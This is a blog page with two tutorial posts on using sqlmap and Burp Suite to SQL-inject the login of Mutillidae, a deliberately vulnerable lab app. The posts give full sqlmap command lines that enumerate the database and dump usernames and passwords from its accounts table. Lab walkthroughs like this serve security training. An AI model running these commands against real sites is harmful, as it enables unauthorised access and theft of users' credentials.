Showing posts with label mysql. Show all posts
Showing posts with label mysql. Show all posts

Wednesday, 13 January 2016

SQLMAP Database Hacking - An Easier Way

Using sqlmap in conjuction with burpsuite (easy)

tools:sqlmap, burpsuite
OS: kali linux

previously in this blog post we used passed some parameters to sqlmap to aid in our attack, well there is a faster method of passing data to sqlmap from burpsuite and its easy

navigate to

  • http://192.168.0.9/mutillidae/index.php?page=login.php

which is the login page we wish to bypass

  • attempt to login using ANY username & ANY password 
  • capture the POST request using burpsuite
  • right click on the request 
  • select save item (then save to your chosen location)
now we can run the sqlmap command easily without passing all the parameters to it  we simply run

sqlmap -r "PATH_TO_SAVED_REQUEST"


I saved the request as sqlmap-practice

This makes it much easier to pass data to sqlmap, however to fully exploit the database ie hack the accounts we still need to find out the following;

database name
database tables
database column

this can only be done (as far as im aware) via experience and/or trial and error

I've utilized this easier method to successfully attack and own all
OWASP A1 (SQL Injection lessons) in mutillidae
Posted by at
Labels: , , ,

SQLMAP - Database takeover tool - the old skool way

Hacking mysql database via SQLMAP

here I will demonstrate a sql injection attack using SQLMAP, I will use this hack to bypass a login

Tools:SQLMAP/Burpsuite
Browser:Iceweasel
Web App:Mutillidae v2.6.30
OS:Kali Linux

First;
  • configure browser and proxy (I'm using burpsuite) then head to 
  •  http://192.168.0.9/mutillidae/index.php?page=login.php 
  • enter some data in the username & password fields
  • In burp review the data from the post capture we need some info for it


so using the capture above we can now begin constructing our sqlmap command.

sqlmap --url="ENTER_FULL_URL_HERE" (this is a combination of the host and post field as shown above)

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php"

next part of the command
--data="ENTER_DATA_HERE" (this is actually the body of the post request)

--data="username=admin&password=admcdicndsjcn&login-php-submit-button=Login"

 and finally 
--banner (retrieves database banner)

 the sqlmap command is now complete. our full sqlmap command is;

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" --banner 

(a truncated video displaying the outcome of the injection)(**banner**) 


BYPASSING A LOGIN USING SQLMAP 


 so we are 100% certain that the mysql database is vulnerable to sql injection, now we will escalate our attack and see what credentials we can grab

So now as we know we need to bypass the loggin presented to us on the login page, we know now that the application vulnerable to sql injection so we will mount an attack to verify this. We already have the main command for the attack already

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login"  

we simply need to append the command slightly, first new command/switch/paramemter we enter is 

--dbs (this tells us the available databases)

there  was 6 options 

form experience I know that the database we need to attack is named nowasp, now we can further ammend our sqlmap command to ;

 remove --dbs (as we now know the name of the databse that we need to hack)
add
-D owasp 
and add
--tables (the tables switch will list all tables within the database owasp)

 again experience tells me i want to retrieve the info held within the accounts table
we can now further ammend our command
remove
--tables
add
-T accounts
add
--Columns (gives us a list of columns to select info from  
bingo we know have a full list of all the columns of info we want to retrieve, in this case i want
firstname
lastname
password
username
we are now ready to complete our sqlmap command and hack so we
remove
--columns 
and add
-C firstname,lastname,password,username
we need to --dump all credentials retrieved so we can see them so we us the --dump command, our full sqlmap injection command is

sqlmap --url="http://192.168.0.9/mutillidae/index.php?page=login.php" --data="username=username&password=password&login-php-submit-button=Login" -D nowasp -T accounts -C firstname,lastname,password,username --dump

we have successfully retrieved all usernames & passwords for the login to the system thereby bypassing any need for us to need our own login.



 


Posted by at
Labels: , , ,
Subscribe to: Posts (Atom)